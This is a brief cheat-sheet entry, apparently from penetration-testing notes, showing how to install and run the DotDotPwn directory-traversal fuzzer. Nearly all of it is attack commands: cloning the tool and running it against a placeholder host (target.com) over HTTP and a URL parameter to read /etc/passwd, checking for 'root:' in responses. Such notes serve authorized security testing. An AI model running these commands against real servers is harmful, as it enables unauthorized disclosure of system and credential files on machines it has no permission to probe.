dotdotPWN

Automated traversal injection

sudo git clone https://github.com/wireghoul/dotdotpwn.git  

sudo perl dotdotpwn.pl -h target.com -x 443 -m http -t 300 -f /etc/passwd -s -q -b

#Also available as Kali package

apt install dotdotpwn

dotdotpwn -m http-url -d 10 -f /etc/passwd -u "https://target.com/?xxnew2018_url2=TRAVERSAL" -b -k "root:"

Last updated